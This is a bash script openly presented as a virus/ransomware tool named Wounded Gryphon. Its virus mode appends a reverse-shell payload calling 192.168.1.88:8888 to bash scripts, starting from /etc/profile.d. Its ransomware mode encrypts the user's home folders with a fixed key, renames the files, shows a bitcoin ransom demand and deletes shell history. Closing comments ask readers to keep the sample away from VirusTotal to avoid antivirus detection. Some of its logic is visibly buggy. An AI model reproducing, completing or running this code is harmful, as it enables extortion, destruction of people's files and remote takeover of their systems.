WoundedGryphon - A virus/ransomware written in bash by @Da2dalus - MalDev101

1. #!/bin/bash
2.  
3. #                   #
4. #    __      __      \                .___         .___
5. #   /  \    /  \____  \_ __  ____   __| _/____   __| _/ ---------
6. #   \   \/\/   /  _ \|  |  \/    \ / __ _/ __ \ / __ | -----------
7. #    \        (  <_> |  |  |   |  / /_/ \  ___// /_/ | ------------
8. #     \__/\  / \____/|____/|___|  \____ |\___  \____ | -----------
9. #     _____\/                   \/ __  \/    \/     \/ ----------
10. #    /  ___ \_______ ___.________ |  |__   ____   ____  ---------
11. #   /   \  __\_  __ <   |  \____ \|  |  \ /  _ \ /    \ ----------
12. #   \    \_\  |  | \/\___  |  |_> |   Y  (  <_> |   |  \ ----------
13. #    \______  |__|   / ____|   __/|___|  /\___\/|___|  / ----------
14. #       /   \/       \/    |__|        \/      \     \/ ---------
15. #      / Wonded Gryphon v4.3  ______----------- # ---------------
16. #     #          _______,---'__,---' ---------------------------
17. #            _,-'---_---__,---' -----------------------------
18. #     /_ #   (,  ---____', --------------------------------
19. #    /  /,,   `, ,-' -------------------------------------
20. #   ;/)   ,',,_/,' # -------------------------------------
21. #   | /\   ,.'//\ / ---------------------------------------
22. #   `-` \ ,,'    /.   # -------------------------------------
23. #        `',   ,-- `./ -----------------------------------------
24. #        '/ / |     /`, -----------------------------------------
25. #        //'',.\_    .\\ -----,{==>- ------------------------------
26. #     __//   __;_`-  \ `;.__,;' ------------------------------------
27. #   ((,--,) (((,------;  `--' --------------------------------------
28. #
29. # Created by Da2dalus a MalDev101 project
30. # This is only an experiment but it can be dangerous.
31. # I am not responsible for the damage.
32. # This is a virus/ransomware that works on unix systems with bash installed.
33. # Tested on Linux (Ubuntu, Debian)
34.  
35. SHEBANG="#!/bin/bash"
36.  
37. ME="$0"
38.  
39. CAT=$(cat "$ME")
40.  
41. VERSION="v4.3"
42.  
43. OFLAG="$1"
44.  
45. # Configuration -------------------------------------------------------------------------------------------------------------#
46.  
47. # Virus mode configuration ----------------------------------------------------$
48.  
49. FLAG="#arrow"
50.  
51. # ------------------------------------------------------------------>
52.  
53. # String you want to append to sh file. Example: reverse tcp bash (metasploit).
54. # Responds to:
55. # IP: 192.168.1.88
56. # PORT: 8888
57.  
58. PAYLOAD="0<&205-;exec 205<>/dev/tcp/192.168.1.88/8888;sh <&205 >&205 2>&205" # Choose payload when infecting
59.  
60. # ------------------------------------------------------------------->
61.  
62. MAXINFECTCOUNT=50 # Maximum infected files
63.  
64. # ------------------------------------------------------------------------------$
65.  
66. # Ransomware mode configuration ------------------------------------------------$
67.  
68. KEY="GrYpHoN" # KEY
69.  
70. CCRYPT="/bin/ccrypt"
71.  
72. # ------------------------------------------------------------------------------$
73.  
74. # ----------------------------------------------------------------------------------------------------------------------------#
75.  
76. # Colors and special caracters
77.  
78. # Reset
79. NC='\033[0m'       # Text Reset
80.  
81. BLINK=$(tput blink)
82.  
83. # Regular Colors
84. Black='\033[0;30m'        # Black
85. Red='\033[0;31m'          # Red
86. Green='\033[0;32m'        # Green
87. Yellow='\033[0;33m'       # Yellow
88. Blue='\033[0;34m'         # Blue
89. Purple='\033[0;35m'       # Purple
90. Cyan='\033[0;36m'         # Cyan
91. White='\033[0;37m'        # White
92.  
93. # Bold
94. BBlack='\033[1;30m'       # Black
95. BRed='\033[1;31m'         # Red
96. BGreen='\033[1;32m'       # Green
97. BYellow='\033[1;33m'      # Yellow
98. BBlue='\033[1;34m'        # Blue
99. BPurple='\033[1;35m'      # Purple
100. BCyan='\033[1;36m'        # Cyan
101. BWhite='\033[1;37m'       # White
102.  
103. # Underline
104. UBlack='\033[4;30m'       # Black
105. URed='\033[4;31m'         # Red
106. UGreen='\033[4;32m'       # Green
107. UYellow='\033[4;33m'      # Yellow
108. UBlue='\033[4;34m'        # Blue
109. UPurple='\033[4;35m'      # Purple
110. UCyan='\033[4;36m'        # Cyan
111. UWhite='\033[4;37m'       # White
112.  
113. # Background
114. On_Black='\033[40m'       # Black
115. On_Red='\033[41m'         # Red
116. On_Green='\033[42m'       # Green
117. On_Yellow='\033[43m'      # Yellow
118. On_Blue='\033[44m'        # Blue
119. On_Purple='\033[45m'      # Purple
120. On_Cyan='\033[46m'        # Cyan
121. On_White='\033[47m'       # White
122.  
123. # High Intensity
124. IBlack='\033[0;90m'       # Black
125. IRed='\033[0;91m'         # Red
126. IGreen='\033[0;92m'       # Green
127. IYellow='\033[0;93m'      # Yellow
128. IBlue='\033[0;94m'        # Blue
129. IPurple='\033[0;95m'      # Purple
130. ICyan='\033[0;96m'        # Cyan
131. IWhite='\033[0;97m'       # White
132.  
133. # Bold High Intensity
134. BIBlack='\033[1;90m'      # Black
135. BIRed='\033[1;91m'        # Red
136. BIGreen='\033[1;92m'      # Green
137. BIYellow='\033[1;93m'     # Yellow
138. BIBlue='\033[1;94m'       # Blue
139. BIPurple='\033[1;95m'     # Purple
140. BICyan='\033[1;96m'       # Cyan
141. BIWhite='\033[1;97m'      # White
142.  
143. # High Intensity backgrounds
144. On_IBlack='\033[0;100m'   # Black
145. On_IRed='\033[0;101m'     # Red
146. On_IGreen='\033[0;102m'   # Green
147. On_IYellow='\033[0;103m'  # Yellow
148. On_IBlue='\033[0;104m'    # Blue
149. On_IPurple='\033[0;105m'  # Purple
150. On_ICyan='\033[0;106m'    # Cyan
151. On_IWhite='\033[0;107m'   # White
152.  
153. # List made by Shakiba Moshiri
154.  
155. # All the BANNERS
156.  
157. function banner1() {
158.    
159.    echo -e "$Blue                _ #      _ $NC"
160.    echo -e "$Blue              _/|  \ _   |\_ $NC"
161.    echo -e "$Blue            _/_ |   \|\\ | _\ $NC"
162.    echo -e "$Blue          _/_/| /  /   \|\ |\_\_     # $NC"
163.    echo -e "$Blue        _/_/  |/  /  _  \/\|  \_\_  / $NC"
164.    echo -e "$Blue      _/_/    ||  | | \*/ ||    \_\/   $NC"
165.    echo -e "$Blue     /_/  | | |\  | \_ /  /| | |  \_\   # $NC"
166.    echo -e "$Blue    //    ||| | \_/   \__/ | |||    \\ / $NC"
167.    echo -e "$Blue   // __| ||\  \ ||    || /  /|| |__ \/ $NC"
168.    echo -e "$Blue  //_/ \|||| \/\\||    ||//\/ ||||/ \_\\ $NC"
169.    echo -e "$Blue ///    \\\\/   /()    ()\   \////    \\\ $NC"
170.    echo -e "$Blue |/      \/    |    |    |     \/      \| $NC"
171.    echo -e "$Blue              /_|  | |_  \  # $NC"
172.    echo -e "$Blue              ///_| |_||\_ \/ $NC"
173.    echo -e "$Blue              |//||/||\/||\/       WOUNDED GRYPHON $VERSION $NC"
174.    echo -e "$Blue               / || ||/||/\/    $NC"
175.    echo -e "$Blue                 {}/|| {}        $NC"
176.    echo -e "$Blue                    ||            $NC"
177.    echo -e "$Blue                    () $NC"
178. }
179.  
180. function banner2() {
181.  
182.    echo -e "$BLINK $Cyan
183.                ++01100101 01110101++             =ඏ=             ++10101110 10100110++
184.              +011100110110   01001111000      0♢0Ŧ0♢0     00011110010   011011001110+
185.          +0110010001100101 0110000101100100   000卄000   0010011010000110 1010011000100110+
186.            +01101101011000010111001001101011++00+0卄00++++11010110010011101000011010110110+
187.                0111001101100  0010110111001100100 ⁆⁅ 0010011001110110100  0011011001110
188.                      011001100 110000101110010++= ⁆⁅ =++010011101000011 001100110
189.                        +01 10100001100101011 10010ʞk01001 11010100110000101 10+
190.                            +0111010001101111  +01ʞk10+  1111011000101110+
191.                                +110101011011  00.∴.00  110110101011+
192.                                  +01100101     0+1ʞk1+0    10100110+
193.                                  +1100101     +0+.∴.+0+     1010011+
194.                                    +1110010   +0+.∴.+0+   0100111+
195.                                      +1110100  01 ∴ 10  0010111+
196.                                                10 ∴ 01
197.                                                10 ∵ 01
198.                                                00.00
199.                                                  : : $NC
200.                 $BBlue Do you got what it takes? $NC
201.                           $BWhite https://bit.ly/3b83sD9 $NC"
202. }
203.  
204. function banner3() {
205.    echo -e " $Cyan
206.                         # ------------------------------------------
207.          __      __      \ -------------- .___ ------- .___ --------
208.         /  \    /  \____  \_ __  ____   __| _/____   __| _/ ---------
209.         \   \/\/   /  _ \|  |  \/    \ / __ _/ __ \ / __ | -----------
210.          \        (  <_> |  |  |   |  / /_/ \  ___// /_/ | ------------
211.           \__/\  / \____/|____/|___|  \____ |\___  \____ | -----------
212.           _____\/                   \/ __  \/    \/     \/ ----------
213.          /  ___ \_______ ___.________ |  |__   ____   ____  ---------
214.         /   \  __\_  __ <   |  \____ \|  |  \ /  _ \ /    \ ----------
215.         \    \_\  |  | \/\___  |  |_> |   Y  (  <_> |   |  \ ----------
216.          \______  |__|   / ____|   __/|___|  /\___\/|___|  / ----------
217.             /   \/       \/    |__|        \/      \     \/ ---------
218.            /$NC $BBlue Wonded Gryphon $VERSION $NC $Cyan---------------- # ---------------
219.           # ---------------------------------------------------------- $NC"
220. }
221.  
222. function banner4() {
223.    echo -e "$Blue
224.                   _________
225.                  / ======= \
226.                 / __________\
227.                | ___________ |
228.                | | I Love  | |
229.                | |  BASH   | |
230.                | |_________| |________________________
231.                \=____________/                        )
232.                / ........... \   WOUNDED GRYPHON     /
233.               / ::::::::::::: \      $VERSION        =D-'
234.              (_________________) $NC"
235. }
236.  
237. function banner5() {
238.    echo -e "$Red  █     █░ ▒█████   █    ██  ███▄    █ ▓█████▄ ▓█████ ▓█████▄   ▄████  ██▀███ ▓██   ██▓ ██▓███   ██░ ██  ▒█████   ███▄    █  $NC";
239.    echo -e "$Red ▓█░ █ ░█░▒██▒  ██▒ ██  ▓██▒ ██ ▀█   █ ▒██▀ ██▌▓█   ▀ ▒██▀ ██▌ ██▒ ▀█▒▓██ ▒ ██▒▒██  ██▒▓██░  ██▒▓██░ ██▒▒██▒  ██▒ ██ ▀█   █  $NC";
240.    echo -e "$Red ▒█░ █ ░█ ▒██░  ██▒▓██  ▒██░▓██  ▀█ ██▒░██   █▌▒███   ░██   █▌▒██░▄▄▄░▓██ ░▄█ ▒ ▒██ ██░▓██░ ██▓▒▒██▀▀██░▒██░  ██▒▓██  ▀█ ██▒ $NC";
241.    echo -e "$Red ░█░ █ ░█ ▒██   ██░▓▓█  ░██░▓██▒  ▐▌██▒░▓█▄   ▌▒▓█  ▄ ░▓█▄   ▌░▓█  ██▓▒██▀▀█▄   ░ ▐██▓░▒██▄█▓▒ ▒░▓█ ░██ ▒██   ██░▓██▒  ▐▌██▒ $NC";
242.    echo -e "$Red ░░██▒██▓ ░ ████▓▒░▒▒█████▓ ▒██░   ▓██░░▒████▓ ░▒████▒░▒████▓ ░▒▓███▀▒░██▓ ▒██▒ ░ ██▒▓░▒██▒ ░  ░░▓█▒░██▓░ ████▓▒░▒██░   ▓██░ $NC";
243.    echo -e "$Red ░ ▓░▒ ▒  ░ ▒░▒░▒░ ░▒▓▒ ▒ ▒ ░ ▒░   ▒ ▒  ▒▒▓  ▒ ░░ ▒░ ░ ▒▒▓  ▒  ░▒   ▒ ░ ▒▓ ░▒▓░  ██▒▒▒ ▒▓▒░ ░  ░ ▒ ░░▒░▒░ ▒░▒░▒░ ░ ▒░   ▒ ▒  $NC";
244.    echo -e "$Red   ▒ ░ ░    ░ ▒ ▒░ ░░▒░ ░ ░ ░ ░░   ░ ▒░ ░ ▒  ▒  ░ ░  ░ ░ ▒  ▒   ░   ░   ░▒ ░ ▒░▓██ ░▒░ ░▒ ░      ▒ ░▒░ ░  ░ ▒ ▒░ ░ ░░   ░ ▒░ $NC";
245.    echo -e "$Red   ░   ░  ░ ░ ░ ▒   ░░░ ░ ░    ░   ░ ░  ░ ░  ░    ░    ░ ░  ░ ░ ░   ░   ░░   ░ ▒ ▒ ░░  ░░        ░  ░░ ░░ ░ ░ ▒     ░   ░ ░  $NC";
246.    echo -e "$Red     ░        ░ ░     ░              ░    ░       ░  ░   ░          ░    ░     ░ ░               ░  ░  ░    ░ ░           ░  $NC";
247.    echo -e "$Red                                        ░              ░                       ░ ░                                           $NC";
248.  
249. }
250.  
251. function banner_text() {
252.    
253.    echo -e " $UBlue
254.  
255.   # Created by Da2dalus a MalDev101 project
256.   # This is only an experiment but it can be dangerous.
257.   # I am not responsible for the damage.
258.   # This is a virus/ransomware that works on unix systems with bash installed.
259.   # Tested on Linux (Ubuntu, Debian) and MacOS (OSX)
260.   # $NC
261.   $BBlue# If virus mode: $NC
262.   $UBlue#
263.   # Check if files are written in bash then start infecting them.
264.   # The virus ignores non bash scripts and already infected files
265.   # $NC
266.   $BBlue# If ransomware mode: $NC
267.   $UBlue#
268.   # Encrypt files in Desktop, Videos ... $NC"
269. }
270.  
271. function error() {
272.  
273.    echo -e "$Red $BLINK _______________________________ ________ __________._. $NC"
274.    echo -e "$Red $BLINK \_   _____/\______   \______   \\_____  \\______   \ | $NC"
275.    echo -e "$Red $BLINK  |    __)_  |       _/|       _/ /   |   \|       _/ | $NC"
276.    echo -e "$Red $BLINK  |        \ |    |   \|    |   \/    |    \    |   \\| $NC"
277.    echo -e "$Red $BLINK /_______  / |____|_  /|____|_  /\_______  /____|_  /__ $NC"
278.    echo -e "$Red $BLINK         \/         \/        \/         \/       \/ \/ $NC"
279.  
280.    echo -e "     "
281. }
282.  
283. function helpfunction() {
284.  
285.    echo -e "$BCyan Available opions: $NC"
286.    echo -e " "
287.    echo -e "$UCyan Show this page: --help $NC"
288.    echo -e "$UCyan Infect all bash files on the system: --infect $NC"
289.    echo -e "$UCyan Encrypt files in Desktop, Videos ...: --encrypt $NC"
290.    echo -e "$UCyan Self destruct when done: (--infect, --encrypt) --self-destruct $NC"
291.    echo -e "$UCyan Unencrypt files: --unencrypt $NC"
292.    echo -e "$UCyan Uninfect system: --uninfect $NC"
293.    echo -e "$UCyan Only show random banner: --banner $NC"
294.  
295. }
296.  
297. # Cleanup function
298.  
299. function cleanup() {
300.    
301.    echo "#!/bin/bash" > Gryphon.sh
302.    echo "sleep 8" >> Gryphon.sh
303.    echo "sudo mv $ME /dev/null" >> Gryphon.sh
304.    chmod 755 Gryphon.sh
305.    ./Gryphon
306.    exit
307. }
308.  
309.  
310. # Virus mode
311.  
312. function check() {
313.    
314.    local IFBASH=$(grep -Fx "$SHEBANG" *)
315.    
316.    if [ "$IFBASH" =~ .*"$SHEBANG" ]
317.  
318.    then
319.      
320.       local LISTNOTREADY=$(echo "$IFBASH" | sed 's|:#!/bin/bash||')
321.       local LISTNOTREADYD=$(echo "$LISTNOTREADY" | tr "\n" " ")
322.       local LISTNOTREADY2=$(grep -Fx "$FLAG" "$LISTNOTREADYD")
323.       local LISTNOTREADY2D=$(echo "$LISTNOTREADY2" | sed '/bar/,+1 d')
324.       LIST=$(echo "$LISTNOTREADY2D" | tr "\n" " ")
325.        
326.       if [ "$LIST" == "" ]
327.        
328.       then
329.          
330.          foldercheck
331.      
332.       else
333.          
334.          infect
335.      
336.       fi
337.      
338.     else
339.        
340.        foldercheck
341.        
342.     fi
343.    
344. }
345.  
346. function foldercheck() {
347.    
348.    local LDIR=$(ls -d *)
349.    
350.    if [ "$LDIR" == "" ]
351.  
352.    then
353.       cd /
354.  
355.       check
356.  
357.    else
358.          
359.       echo "$LDIR" > LIST.txt
360.      
361.       CDDIR=$(shuf -n1 LIST.txt)
362.      
363.       cd "$CDDIR"
364.      
365.       check
366.    fi
367. }
368.  
369. # PAYLOAD
370.  
371. function infect() {
372.    
373.    # String you want to append to sh file. Example: reverse tcp bash (metasploit).
374.    # Responds to:
375.    # IP: 192.168.1.88
376.    # PORT: 8888
377.  
378.    echo "$PAYLOAD" >> "$LIST"
379.    echo "$FLAG" >> "$LIST"
380.  
381.    INFECTCOUNT=$(($INFECTCOUNT + 1))
382.  
383.    if [ "$INFECTCOUNT" == "$MAXINFECTCOUNT" ]
384.  
385.    then
386.       if grep -q --self-destruct <<<"$@"
387.  
388.       then
389.          echo -e "$BBlue Done...$NC"
390.          cleanup
391.    
392.       else
393.          echo -e "$BBlue Done...$NC"
394.          exit
395.    
396.       fi
397.    
398.    else
399.       check
400.    
401.    fi
402.    
403. }
404.  
405. # choose a random banner
406.  
407. function CHOOSE_BANNER() {
408.    
409.    banners=(banner1 banner2 banner3 banner4 banner5) ;
410.    THECHOSENONE="${banners[RANDOM%${#banners[@]}]}";
411. }
412.  
413. CHOOSE_BANNER
414.  
415. function BANNER() {
416.    
417.    "$THECHOSENONE"
418.    echo "   "
419.    banner_text
420. }
421.  
422. # start infecting autostart
423.  
424. function virus_start() {
425.    
426.    BANNER # Very important :)
427.    
428.    cd /etc/profile.d/
429.    
430.    check
431.    
432. }
433.  
434. # RANSOMWARE MODE
435.  
436. function ccryptcheck() {
437.    
438.    if [ -f "$CCRYPT" ]
439.  
440.    then
441.       scan
442.    
443.    else
444.       sudo apt install ccrypt -yy
445.       brew install ccrypt
446.       yum install ccrypt
447.       pacman install ccrypt
448.       ccryptcheck
449.    
450.    fi
451. }
452.  
453. function encryptvideos() {
454.    
455.    cd "$HOME"
456.    cd Videos
457.    local LS=$(ls -a)
458.    local LIST=$(echo "$LS" | tr "\n" " ")
459.    ccencrypt "$LIST" -k "$KEY"
460.    for f in *.cpt; do
461.       mv -- "$f" "${f%.cpt}.WOUND"
462.    done
463.  
464. }
465.  
466. function encryptdesktop() {
467.    
468.    cd "$HOME"
469.    cd Desktop
470.    local LS=$(ls -a)
471.    local LIST=$(echo "$LS" | tr "\n" " ")
472.    ccencrypt "$LIST" -k "$KEY"
473.    for f in *.cpt; do
474.       mv -- "$f" "${f%.cpt}.WOUND"
475.    done
476.  
477. }
478.  
479. function encryptpictures() {
480.    
481.    cd "$HOME"
482.    cd Pictures
483.    local LS=$(ls -a)
484.    local LIST=$(echo "$LS" | tr "\n" " ")
485.    ccencrypt "$LIST" -k "$KEY"
486.    for f in *.cpt; do
487.       mv -- "$f" "${f%.cpt}.WOUND"
488.    done
489.  
490. }
491.  
492. function encryptdocuments() {
493.    
494.    cd "$HOME"
495.    cd Documents
496.    local LS=$(ls -a)
497.    local LIST=$(echo "$LS" | tr "\n" " ")
498.    ccencrypt "$LIST" -k "$KEY"
499.    for f in *.cpt; do
500.       mv -- "$f" "${f%.cpt}.WOUND"
501.    done
502.  
503. }
504.  
505. function encryptdownloads() {
506.    
507.    cd "$HOME"
508.    cd Downloads
509.    local LS=$(ls -a)
510.    local LIST=$(echo "$LS" | tr "\n" " ")
511.    ccencrypt "$LIST" -k "$KEY"
512.    for f in *.cpt; do
513.       mv -- "$f" "${f%.cpt}.WOUND"
514.    done
515.  
516. }
517.  
518. function encryptmusic() {
519.    
520.    cd "$HOME"
521.    cd Music
522.    local LS=$(ls -a)
523.    local LIST=$(echo "$LS" | tr "\n" " ")
524.    ccencrypt "$LIST" -k "$KEY"
525.    for f in *.cpt; do
526.       mv -- "$f" "${f%.cpt}.WOUND"
527.    done
528.  
529. }
530.  
531. function ransom_start() {
532.    
533.    BANNER
534.    ccryptcheck
535.    sleep 5
536.    encryptdesktop
537.    sleep 5
538.    encryptdocuments
539.    sleep 5
540.    encryptdownloads
541.    sleep 5
542.    zenity --warning --text="Your files are encrypted by Wounded Gryphon! Pay 500$ worth in bitcoin to this bitcoin address: Your Bitcoin Address so you can receive the decrypt instructions"
543.    encryptmusic
544.    sleep 5
545.    encryptpictures
546.    sleep 5
547.    encryptvideos
548.    cd "$HOME" && rm .bash_history
549.    sleep 5
550.    
551.    if grep -q --self-destruct <<<"$@"
552.  
553.    then
554.       echo -e "$BBlue Done...$NC"
555.       cleanup
556.    
557.    else
558.       echo -e "$BBlue Done...$NC"
559.       exit
560.    
561.    fi
562.    
563. }
564.  
565. # Uninfect
566.  
567. function remcheck() {
568.    
569.    local IFBASH=$(grep -Fx "$SHEBANG" *)
570.    
571.    if grep -q "$SHEBANG" <<<"$IFBASH"
572.  
573.    then
574.      
575.       local LISTNOTREADY=$(echo "$IFBASH" | sed 's|:#!/bin/bash||')
576.       local LISTNOTREADYD=$(echo "$LISTNOTREADY" | tr "\n" " ")
577.       local LISTNOTREADY2=$(grep -Fx "$FLAG" "$LISTNOTREADYD")
578.       local LISTNOTREADY2D=$(echo "$LISTNOTREADY2" | sed 's|:#arrow||')
579.       LIST=$(echo "$LISTNOTREADY2D" | tr "\n" " ")
580.        
581.       if [ "$LIST" == "" ]
582.        
583.       then
584.          
585.          remfoldercheck
586.      
587.       else
588.          
589.          uninfect
590.      
591.       fi
592.      
593.     else
594.        
595.        remfoldercheck
596.        
597.     fi
598.    
599. }
600.  
601. function remfoldercheck() {
602.    
603.    local LDIR=$(ls -d *)
604.    
605.    if [ "$LDIR" == "" ]
606.  
607.    then
608.       cd /
609.  
610.       remcheck
611.  
612.    else
613.          
614.       echo "$LDIR" > LIST.txt
615.      
616.       CDDIR=$(shuf -n1 LIST.txt)
617.      
618.       cd "$CDDIR"
619.      
620.       remcheck
621.    fi
622. }
623.  
624.  
625. function uninfect() {
626.    
627.    sed -i '/"$PAYLOAD"/d' "$LIST"
628.    sed -i '/"$FLAG"/d' "$LIST"
629.  
630.    RINFECTCOUNT=$(($RINFECTCOUNT + 1))
631.  
632.    if [ "$RINFECTCOUNT" == $MAXINFECTCOUND ]
633.  
634.    then
635.    
636.       if grep -q --self-destruct <<<"$@"
637.    
638.       then
639.          echo -e "$BBlue Done...$NC"
640.          cleanup
641.    
642.       else
643.          echo -e "$BBlue Done...$NC"
644.          exit
645.    
646.       fi
647.    
648.    else
649.       remcheck
650.    
651.    fi
652.    
653. }
654.  
655. function uninfectstart() {
656.    
657.    BANNER # Very important :)
658.  
659.    cd /etc/profile.d/
660.  
661.    remcheck
662.    
663. }
664.  
665. # Unencrypt
666.  
667. function unencryptvideos() {
668.    
669.    cd "$HOME"
670.    cd Videos
671.    local LS=$(ls -a)
672.    local LIST=$(echo "$LS" | tr "\n" " ")
673.    ccdecrypt "$LIST" -K "$KEY"
674. }
675.  
676. function unencryptdesktop() {
677.    
678.    cd "$HOME"
679.    cd Desktop
680.    local LS=$(ls -a)
681.    local LIST=$(echo "$LS" | tr "\n" " ")
682.    ccdecrypt "$LIST" -K "$KEY"
683. }
684.  
685. function unencryptpictures() {
686.    
687.    cd "$HOME"
688.    cd Pictures
689.    local LS=$(ls -a)
690.    local LIST=$(echo "$LS" | tr "\n" " ")
691.    ccdecrypt "$LIST" -K "$KEY"
692. }
693.  
694. function unencryptdocuments() {
695.    
696.    cd "$HOME"
697.    cd Documents
698.    local LS=$(ls -a)
699.    local LIST=$(echo "$LS" | tr "\n" " ")
700.    ccdecrypt "$LIST" -K "$KEY"
701. }
702.  
703. function unencryptdownloads() {
704.    
705.    cd "$HOME"
706.    cd Downloads
707.    local LS=$(ls -a)
708.    local LIST=$(echo "$LS" | tr "\n" " ")
709.    ccdecrypt "$LIST" -K "$KEY"
710.  
711. }
712.  
713. function unencryptmusic() {
714.    
715.    cd "$HOME"
716.    cd Music
717.    local LS=$(ls -a)
718.    local LIST=$(echo "$LS" | tr "\n" " ")
719.    ccdecrypt "$LIST" -K "$KEY"
720.  
721. }
722.  
723. function unencrypt() {
724.    
725.    BANNER
726.    ccryptcheck
727.    sleep 5
728.    unencryptdesktop
729.    sleep 5
730.    unencryptdocuments
731.    sleep 5
732.    unencryptdownloads
733.    sleep 5
734.    unencryptmusic
735.    sleep 5
736.    unencryptpictures
737.    sleep 5
738.    unencryptvideos
739.    cd "$HOME" && rm .bash_history
740.    sleep 5
741.    
742.    if grep -q --self-destruct <<<"$@"
743.  
744.    then
745.       echo -e "$BBlue Done...$NC"
746.       cleanup
747.    
748.    else
749.       echo -e "$BBlue Done...$NC"
750.       exit
751.    
752.    fi
753.    
754. }
755.  
756. # Start
757.  
758. if [ "$OFLAG" == "--infect" ]
759.  
760. then
761.    virus_start
762.  
763. elif [ "$OFLAG" == "--encrypt" ]
764.  
765. then
766.    ransom_start
767.    
768. elif [ "$OFLAG" == "--uninfect" ]
769.  
770. then
771.    uninfect
772.  
773. elif [ "$OFLAG" == "--help" ]
774.  
775. then
776.    helpfunction
777.    
778. elif [ "$OFLAG" == "--unencrypt" ]
779.  
780. then
781.    unencrypt
782.  
783. elif [ "$OFLAG" == "--banner" ]
784.  
785. then
786.    BANNER
787.  
788. elif [ $# -le 0 ]
789.  
790. then
791.    error
792.    echo -e "   "
793.    echo -e "$Red No arguments specified! $NC"
794.    echo -e "$Red Use$NC $BRed--help$NC $Red to display options.$NC"
795.  
796. else
797.    error
798.    echo -e "   "
799.    echo -e "$Red No such argument available!$NC"
800.    echo -e "$Red Use$NC $BRed--help$NC $Red to display options.$NC"
801.  
802. fi
803.  
804.  
805. #    |\                     /)      
806. #  /\_\\__               (_//
807. # |   `>\-`     _._       //`)  
808. #  \ /` \\  _.-.---.`-._ //
809. #   `    \|`  /     \  `|/
810. #         |   \.@-@./   |
811. #         |.../`\_/`\...|
812. #         |:://  _  \\::|
813. #         | | \     )|_ |
814. #         \/`\_`>  <_/ \/
815. #          \__/'---'\__/
816. #           `-. ::: .-'
817. #            //`:::`\\
818. #           //   '   \\
819. #          |/         \\
820. #
821. # PLEASE DO NOT COPY THE SOURCE CODE OF THIS PROJECT AND RENAME IT
822. # THAT'S NOT CREATING THAT IS STEALING.
823. #
824. # THIS SOFTWARE IS PROTECTED BY A GNU PUBLIC LICENSE
825. #
826. # DO NOT UPLOAD THIS SAMPLE ON VIRUS TOTAL TO PREVENT
827. # ANTI VIRUS DETECTION.
828. #
829. # I AND THE TEAM ARE NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY
830. # THIS SOFTWARE!
831. #
832. # THANKS FOR THE PEOPLE WHO ADDET THERE CODE TO THIS PROJECT
833. # AND SUPPORTED IT
834. #
835. # NEW VERSIONS WILL BE COMING SOON (I HOPE)
836. #
837. # Greetings from the MalDev101 TEAM